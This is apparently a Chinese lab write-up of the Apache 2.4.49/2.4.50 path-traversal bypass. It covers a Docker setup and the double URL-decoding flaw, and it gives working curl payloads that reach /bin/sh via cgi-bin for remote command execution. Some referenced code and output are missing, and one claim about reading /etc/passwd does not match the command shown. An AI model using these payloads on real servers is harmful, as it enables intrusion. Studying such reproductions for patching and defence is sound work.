这个漏洞可以影响Apache HTTP Server 2.4.49以及2.4.50两个版本。

执行如下命令编译及运行一个存在漏洞的Apache HTTP Server 2.4.50版本服务器：

docker-compose build
docker-compose up -d

环境启动后，访问http://your-ip:8080即可看到Apache默认的It works!页面。

2.4.50版本对ap_normalize_path函数进行修改，补充了如下代码，对.%2e的绕过形式进行了判断，可以避免使用该方法绕过。

在处理外部HTTP请求时，会调用 ap_process_request_internal函数对url路径进行处理，在该函数中，首先会调用ap_normalize_path函数进行一次url解码，之后会调用ap_unescape_url函数进行二次解码，代码如下：

• 在处理前path参数为/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
• 经过ap_normalize_path函数处理后path参数变成/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd
• ap_unescape_url函数实际会调用unescape_url函数,经过unescape_url函数处理后，可以看到此时的url字符串内容变成/icons/../../../../etc/passwd

我们使用CVE-2021-41773中的Payload已经无法成功利用漏洞了，说明2.4.50进行了修复。

但我们可以使用.%%32%65进行绕过（注意其中的/icons/必须是一个存在且可访问的目录）：

curl -v --data "echo;id" http://192.168.237.129:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

可见，成功读取到/etc/passwd：

在服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令：

curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

https://www.jianshu.com/p/3076d9ec68cf